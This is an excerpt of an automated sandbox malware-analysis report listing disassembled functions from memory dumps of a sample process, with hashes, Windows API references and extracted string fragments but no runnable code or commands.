Instruction Fuzzy Hash: C651AA74E00708DFDB08DFAAD594A9DBBF6AF88304F10806AE815AB368DB359945CF54

Function 2792D48E Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ac262b07d53e2ddcd8299537003a03072d4df9883f8c2954f9681e89ce0a40
Instruction ID: c6441b6e1d37f7dcf3db6a6ee637cbf69f56a068556cc1176fbbda0d5187656a
Opcode Fuzzy Hash: 62ac262b07d53e2ddcd8299537003a03072d4df9883f8c2954f9681e89ce0a40
Instruction Fuzzy Hash: 9351B874E00708DFDB08DFAAD584A9DBBB2BF88304F10806AE815BB368DB359945CF14

Function 292565B0 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5d5094c293fe613fb85a31d1e91ae2191b598eb440253fe90b75685d997869
Instruction ID: 1737c9d591fe645eb5470830a0edd1b5d03dbf27b63710bf4c014d000139afa6
Opcode Fuzzy Hash: 8d5d5094c293fe613fb85a31d1e91ae2191b598eb440253fe90b75685d997869
Instruction Fuzzy Hash: A841E4B1E006088BEB18DFAAC9547DEFBF2AF89304F24D06AC418BB254DB355946CF54

Function 29257AE0 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acadc2b7711ecd90ad6f94a77a5fa939988bc33ac404a60f521cb86542b97570
Instruction ID: bb04b2dba901f6dfeb462d2ac33e19f1bceae3814da30304732951899992873d
Opcode Fuzzy Hash: acadc2b7711ecd90ad6f94a77a5fa939988bc33ac404a60f521cb86542b97570
Instruction Fuzzy Hash: 1541E4B1E006088BDB18CFAAD94069EFBF6AF89304F24D02AD418BB255EB355946CF50

Function 292C5428 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144521781.00000000292C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 292C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_292c0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff66e5daaefd20e208e1ca8e26865655787bbda2311b42acb24e6674bda49f90
Instruction ID: c07e38cc5d6acc0e322b8fe0b74d1587523e5715d190a021f268abbbfdfb25a9
Opcode Fuzzy Hash: ff66e5daaefd20e208e1ca8e26865655787bbda2311b42acb24e6674bda49f90
Instruction Fuzzy Hash: 09411270E042199FDB08CFAAD844ADEBBF6BF89304F20D16AD418BB255EB345942CF40

Function 292C0DB2 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144521781.00000000292C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 292C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_292c0000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c23b1559df8a30c03ee720c93272fa5e1eb0ceaaa9bc517dca1040856ed92b0
Instruction ID: 9d842155901b44ba6083c13178893c899551e96492d94a841c41c7b5c34e699a
Opcode Fuzzy Hash: 6c23b1559df8a30c03ee720c93272fa5e1eb0ceaaa9bc517dca1040856ed92b0
Instruction Fuzzy Hash: 2841F5B1E016188BDB08CFEAD8406DEFBF2AF89304F20D12AD418BB255EB355946CF54

Function 29300E87 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a135303f3817a8ba558b9ad7d3332dc763b1d172623e6c4dce252e0f965215a
Instruction ID: 2ca8851b6e1a686cb6a975b03f29bdb160c4154b82efe7a1f64458ea8e3c68cb
Opcode Fuzzy Hash: 7a135303f3817a8ba558b9ad7d3332dc763b1d172623e6c4dce252e0f965215a
Instruction Fuzzy Hash: 3841D271E002188FDB18DFAAD85479EBBF2BF89304F20D06AD418BB255EB345946CF45

Function 292534B2 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e34a6ede19245c9b44c731dfc370add4e231115867775885c54b9690c93c09f
Instruction ID: 117533207ba6c58ddc4b956823cbb2d6274a84c84246f1ae80ca6482ed8a29cd
Opcode Fuzzy Hash: 2e34a6ede19245c9b44c731dfc370add4e231115867775885c54b9690c93c09f
Instruction Fuzzy Hash: B441D5B1E01248DBEB18CFB6C9946DEBBF2AF89304F20E069D419BB255DB355946CF40

Function 29307608 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144666290.0000000029300000.00000040.00000800.00020000.00000000.sdmp, Offset: 29300000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29300000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53de1192ff3c6a54dbe6914a622bd94f6edb6c46f1d938e45f5d2e17b9ac4305
Instruction ID: ba5230722e6621a8407c0edef3f9032e22b1ede8a0c04b6e940d8fce71592264
Opcode Fuzzy Hash: 53de1192ff3c6a54dbe6914a622bd94f6edb6c46f1d938e45f5d2e17b9ac4305
Instruction Fuzzy Hash: A131D375E012188FDB08DFBAC8506DEFBF2AF89304F20E06AD419AB255DB355906CF51

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON

Download Yara Rule

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1687216190.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Function 27926590 Relevance: 10.4, Strings: 8, Instructions: 445
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 279266A5
(o^q, xrefs: 27926742
,bq, xrefs: 27926A20
(o^q, xrefs: 27926A8F
,bq, xrefs: 27926A30
(o^q, xrefs: 27926679
(o^q, xrefs: 27926A9F
(o^q, xrefs: 279265BE

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: f59b2f3b3a47675a2e1a78826bdc08f70f50f057ee6942d0de7dff4731d06d4f
Instruction ID: 64bcb724df426a29151369ac6bbfe650e16d134a773651f40bdf69cd87ea9e19
Opcode Fuzzy Hash: f59b2f3b3a47675a2e1a78826bdc08f70f50f057ee6942d0de7dff4731d06d4f
Instruction Fuzzy Hash: BF127C34A00B08CFCB14EF68D984A9EBBF5BF48318F2085A9E5459BB65DB31ED45CB50

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1687216190.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 2932E0A9 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2932E136
GetCurrentThread.KERNEL32 ref: 2932E173
GetCurrentProcess.KERNEL32 ref: 2932E1B0
GetCurrentThreadId.KERNEL32 ref: 2932E209

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 448ce73e0a44bf03a13f3bb09ce00e8f63225e5e48454adb18543ad2c972c393
Instruction ID: 08fd8300949a346c225fcc5de74eee1c74f0a4e989d3d569ef670e747ee2cc43
Opcode Fuzzy Hash: 448ce73e0a44bf03a13f3bb09ce00e8f63225e5e48454adb18543ad2c972c393
Instruction Fuzzy Hash: 895157B0D017498FEB14DFA9D5487DEBBF1EF98310F208569E019A7360DB345881CB65

Function 2932E0B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 2932E136
GetCurrentThread.KERNEL32 ref: 2932E173
GetCurrentProcess.KERNEL32 ref: 2932E1B0
GetCurrentThreadId.KERNEL32 ref: 2932E209

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0669614263d08bbb36e184d5508dbe8480113c65f833fc76f4cae5341b571cf4
Instruction ID: b3aa088fc6562182d1c675f6568c5a0cad02be5f16c09e365b2a490f5e7349f4
Opcode Fuzzy Hash: 0669614263d08bbb36e184d5508dbe8480113c65f833fc76f4cae5341b571cf4
Instruction Fuzzy Hash: C25168B0D017498FDB14DFA9D588B9EBBF1EF48314F208169E059A7360D734A885CF65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000003.00000001.1687216190.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1687216190.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_jphwmyiA.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 27926202 Relevance: 5.3, Strings: 4, Instructions: 301
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 27926128
,bq, xrefs: 2792611A
(o^q, xrefs: 279260B0
(o^q, xrefs: 279260A2

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 90e423245bcb26b49e7a5331188fd603ed3a36380fcc655a79e16c58bc75796d
Instruction ID: 5cb511fcbbed3389e6914f1f33f057385530edd7a8e7fca0c773d3fbdccbc7c6
Opcode Fuzzy Hash: 90e423245bcb26b49e7a5331188fd603ed3a36380fcc655a79e16c58bc75796d
Instruction Fuzzy Hash: 9DC15030A00615CFCB04DFA9C984A9DBBF6BF49309F2584A5E901ABA69DB30EC45DF51

Function 27926589 Relevance: 5.3, Strings: 4, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 279266A5
(o^q, xrefs: 27926742
(o^q, xrefs: 27926679
(o^q, xrefs: 279265BE

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: 91c1ce68524f36a95992571a444f9f8072809be3a5e87d1447f95b81a9bd0a9f
Instruction ID: 35c0e3584d44647c77feb81a090e1a02d1411e9452b60b20c55ce6ce1ecb1231
Opcode Fuzzy Hash: 91c1ce68524f36a95992571a444f9f8072809be3a5e87d1447f95b81a9bd0a9f
Instruction Fuzzy Hash: 27C16C70A00B09DFCB04DF69C584A9EBBF6BF48308F108599E915ABB65DB31ED40DB90

Function 27920028 Relevance: 4.3, Strings: 3, Instructions: 548
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 279202C3
\B%, xrefs: 2792030C
\B%, xrefs: 27920306

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR^q$\B%$\B%
API String ID: 0-1747193719
Opcode ID: 5f584a95de0f705770612986792609fa54e9f5b2eb20e411f6d99e5c6a598903
Instruction ID: 45cdef67051ccd78b3962682a6344f816473c95d1169bd012386b5903a479fce
Opcode Fuzzy Hash: 5f584a95de0f705770612986792609fa54e9f5b2eb20e411f6d99e5c6a598903
Instruction Fuzzy Hash: 8A52DA74910219CFCB58DFA4DA94B9EBBB2FB88300F2081A5D949A7355DF386E85CF50

Function 27920040 Relevance: 4.3, Strings: 3, Instructions: 541
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LR^q, xrefs: 279202C3
\B%, xrefs: 2792030C
\B%, xrefs: 27920306

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR^q$\B%$\B%
API String ID: 0-1747193719
Opcode ID: 4bddd3d866bf31363cbdbc8ea26920a19c5d9d9f39f9d551a1efe2716b9e7bf8
Instruction ID: ef759765c3cf8331f68f08ae3360cdd8cd91731d12fc42bb02b25d34162b402f
Opcode Fuzzy Hash: 4bddd3d866bf31363cbdbc8ea26920a19c5d9d9f39f9d551a1efe2716b9e7bf8
Instruction Fuzzy Hash: 0E52DA74910219CFCB58DFA4DA94B9EBBB2FB88300F2081A5D949A7355DF386E85CF50

Function 27927F28 Relevance: 2.8, Strings: 2, Instructions: 318COMMON

Download Yara Rule

Strings

4'^q, xrefs: 27927F41
4'^q, xrefs: 27927F67

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: be11a577f6924787e59cf08bde21a5fc4b2743a72938296930ef281b2470cc13
Instruction ID: f7d6ece2c1090d30bfdb90c9a8dd725078018b1d722061d594c26c7230d25edd
Opcode Fuzzy Hash: be11a577f6924787e59cf08bde21a5fc4b2743a72938296930ef281b2470cc13
Instruction Fuzzy Hash: A3B18430344F05CFD704BB29C956F6977EAEF89649F1400A5E601DF3AADEA9CC42A781

Function 27924DB0 Relevance: 2.8, Strings: 2, Instructions: 261COMMON

Download Yara Rule

Strings

Hbq, xrefs: 27924ECE
Hbq, xrefs: 27924E9B

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: 92c58c109bd79187c46c4d564a596b8490bc56ca94ce5eac9e39a7ac871a843c
Instruction ID: 17f054c7d8a851b17d1942f8220928a00862bca080a29b700047a7501ed7dba4
Opcode Fuzzy Hash: 92c58c109bd79187c46c4d564a596b8490bc56ca94ce5eac9e39a7ac871a843c
Instruction Fuzzy Hash: 6991AF31700754DFDB09AF24C854B6EBBE6BB89304F2485A9E9458B3A9DF38CC41DB91

Function 2931DCD0 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

LR^q, xrefs: 2931DCEC
LR^q, xrefs: 2931DE19

Memory Dump Source

Source File: 00000003.00000002.4144755266.0000000029310000.00000040.00000800.00020000.00000000.sdmp, Offset: 29310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29310000_jphwmyiA.jbxd

Similarity

API ID:
String ID: LR^q$LR^q
API String ID: 0-4089051495
Opcode ID: 5d2c65dd95298ed01c652637d85fba218e8c15727c826a15b5b81dcdb8e88b41
Instruction ID: 703dcd13c8a4a5ea05dcc301f6d280bd35d67ad8786d416957010a4fb5dcaefd
Opcode Fuzzy Hash: 5d2c65dd95298ed01c652637d85fba218e8c15727c826a15b5b81dcdb8e88b41
Instruction Fuzzy Hash: B8819C35B105118FCB08DF78C844A5E77B6FF89A04B1181A9E516DB3B5DB34EC02CB92

Function 27928A10 Relevance: 2.7, Strings: 2, Instructions: 213COMMON

Download Yara Rule

Strings

4'^q, xrefs: 27928C14
4'^q, xrefs: 27928BFD

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: dd78e122b1c82547e9487f30c592f3a2e760f572c9f42478fc3e50ac0734a101
Instruction ID: b927fc8f62c9a76f6558a0958efd3a85cda84edff8390569742e7abdf0755a52
Opcode Fuzzy Hash: dd78e122b1c82547e9487f30c592f3a2e760f572c9f42478fc3e50ac0734a101
Instruction Fuzzy Hash: 1671D130700705DFC701EB69C885E6BBBEAFF88314F1484A6E944CB21ADB35E901DBA1

Function 29257520 Relevance: 2.7, Strings: 2, Instructions: 209COMMON

Download Yara Rule

Strings

(&^q, xrefs: 2925763B
(bq, xrefs: 292576FA

Memory Dump Source

Source File: 00000003.00000002.4144371849.0000000029250000.00000040.00000800.00020000.00000000.sdmp, Offset: 29250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29250000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (&^q$(bq
API String ID: 0-1294341849
Opcode ID: 1141e59fd68f46432e16353c20d572c69a6b8801cf07cb18e853ca03eecde12f
Instruction ID: c53e261b8f185704336e9ae63b407ddb8885e86df540d6b694c80cdceba872b1
Opcode Fuzzy Hash: 1141e59fd68f46432e16353c20d572c69a6b8801cf07cb18e853ca03eecde12f
Instruction Fuzzy Hash: 91719131F003599FDB19DFB9C8506AEBBB6AF89700F108569E406A7380DF34AD46CB95

Function 27925358 Relevance: 2.7, Strings: 2, Instructions: 177COMMON

Download Yara Rule

Strings

,bq, xrefs: 279253F0
,bq, xrefs: 279253E6

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 36fb336f76e051f161f7f6d291b00925d9f11315eea108b3dc1cb991ee0a3960
Instruction ID: 078395b5eb270b4d66621086ea4e3d7e28f56b98f20ea4e8bc2958698a5cde96
Opcode Fuzzy Hash: 36fb336f76e051f161f7f6d291b00925d9f11315eea108b3dc1cb991ee0a3960
Instruction Fuzzy Hash: B5619134A04A25CFCB04EF68C8A4DADBBF6BF8820AB6180E5E505DB369D731DC41DB51

Function 27922F13 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

Xbq, xrefs: 27922F2D
Xbq, xrefs: 27922F56

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: Xbq$Xbq
API String ID: 0-1243427068
Opcode ID: 4ea24f5b163eca8f5268033829bb343932ad823f44b7db06c8dcc7184c91e460
Instruction ID: e843e24fc39796a840d917e6766dec1be66c2b7f03c44d1eed3ac5c23f679850
Opcode Fuzzy Hash: 4ea24f5b163eca8f5268033829bb343932ad823f44b7db06c8dcc7184c91e460
Instruction Fuzzy Hash: 90319D31704B15CBCB0C6A7945952BFA6EABBC4309F15407EE916D3388CFB9CC45A3A1

Function 27927D88 Relevance: 2.6, Strings: 2, Instructions: 96COMMON

Download Yara Rule

Strings

$^q, xrefs: 27927E67
$^q, xrefs: 27927E44

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: dd40c37b51270292a0c5e1c37a093f404d046222c2510bd1e36b2d4679a0c6bc
Instruction ID: 349d9a2eaadf104c7740f3cd2aa0882739d4293c6f6a1170d80037f1809efe1a
Opcode Fuzzy Hash: dd40c37b51270292a0c5e1c37a093f404d046222c2510bd1e36b2d4679a0c6bc
Instruction Fuzzy Hash: C5312C70305707DFC719AB38C894A2D77BAFB84714B10049AD215EB276DE36CC8197E1

Function 2792936D Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

(o^q, xrefs: 279293A8

Memory Dump Source

Source File: 00000003.00000002.4141493566.0000000027920000.00000040.00000800.00020000.00000000.sdmp, Offset: 27920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_27920000_jphwmyiA.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 3aaa89979ca577f3ac12aae1c1671a662cfd31fd77221159b565003e4c242ac2
Instruction ID: c3543ee01290949e9493154edba00c9c443a523abc23cf2d8509a89ba0cde5f6
Opcode Fuzzy Hash: 3aaa89979ca577f3ac12aae1c1671a662cfd31fd77221159b565003e4c242ac2
Instruction Fuzzy Hash: FD12A074A00B09DFCB04EF68C584A9EBBF6FF48328F258555E415AB299DB34ED80DB50

Function 2932B1A4 Relevance: 1.7, APIs: 1, Instructions: 187COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2932B371

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 82b1e3333100979d9b4df6c6f784911658178be0988d7d4f0b5afdbacec82b4e
Instruction ID: 6ff86e3f1d18db6e1a45bf8b56e9e41a3a4cd4b2a0fcc05258632ef637048cfd
Opcode Fuzzy Hash: 82b1e3333100979d9b4df6c6f784911658178be0988d7d4f0b5afdbacec82b4e
Instruction Fuzzy Hash: B6717BB4D00218DFDF14CFA9D984ADEBBF1BF0A300F1491AAE558A7221D7309985CF45

Function 2932B1B0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 2932B371

Memory Dump Source

Source File: 00000003.00000002.4144847352.0000000029320000.00000040.00000800.00020000.00000000.sdmp, Offset: 29320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29320000_jphwmyiA.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3eaf88fc6a8a2ede53fe52bcb8fb4698e7e030d1f870900bd0e97b3dc7274e2c
Instruction ID: da9e2bc97ed0e11f9d0a2a63241124788df078427b75e3cec08b6fb8dd6ea30b
Opcode Fuzzy Hash: 3eaf88fc6a8a2ede53fe52bcb8fb4698e7e030d1f870900bd0e97b3dc7274e2c
Instruction Fuzzy Hash: D3717AB4D00218DFDF10CFA9D984ADEBBF1BF0A300F2091AAE558A7221D7709A85CF45

Function 2924B43C Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4144277720.0000000029240000.00000040.00000800.00020000.00000000.sdmp, Offset: 29240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_29240000_jphwmyiA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0362c12418a3aecb98d8716671eda9f6b3ee33c1343b0178f9fffa8def38af8a
Instruction ID: d279de9dfe0d4ee820cd363090c8eb5d518a241ecd5d22720797f8db3fa0183c
Opcode Fuzzy Hash: 0362c12418a3aecb98d8716671eda9f6b3ee33c1343b0178f9fffa8def38af8a
Instruction Fuzzy Hash: B3415B78D04108CBCB08DF99D890ADDBBB6FF49350F60A159E408AB285C735A987CF91

Function 2932E300 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

